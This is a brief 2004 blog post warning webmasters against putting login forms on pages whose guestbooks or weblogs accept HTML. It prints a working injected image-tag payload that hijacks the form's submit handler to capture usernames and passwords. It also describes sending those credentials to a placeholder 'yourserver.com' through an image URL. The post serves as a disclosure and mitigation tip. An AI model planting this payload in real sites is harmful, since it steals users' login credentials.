Remove login pages to a separate page!

Michael Schwarz on Tuesday, April 6, 2004

I looked around the web to find websites with security leaks. After months, nothing has changed with the webmasters: they still offer login textboxes side by side with guestbooks or weblogs. Some weeks ago I posted a sample on how to allow JavaScript execution on websites with a mouseover. But this was not very good...

Today, I will show code that allows you to get the username and password from pages that have the login form on the same page as the guestbook. The following code can be added to a guestbook or a weblog if they accept HTML code; they do not have to allow <SCRIPT> tags:

<img src="/trans.gif" onreadystatechange="document.forms[0].onsubmit=new Function('alert(\'Website hacked: \'+document.forms[0].username.value+\'|\'+document.forms[0].password.value);');" width=1 height=1>

When the page is displayed, the onreadystatechange event of the image fires (note: trans.gif must be available on this website; it can be replaced by any other image). The handler assigns a new function to the onsubmit event handler of the first form on the page. When you click submit (that is, log in), a message box appears showing your credentials. It is very easy to load a second image from your server with the credentials as additional arguments like http://yourserver.com/image.gif?username=xx&password=yy, so you have everything you want.

I have created this small script to show you how easy it still is to get user credentials.

To be secure, put the login form on a separate page!!!

If you need assistance to prevent such security leaks, go to http://www.schwarz-interactive.de to get help.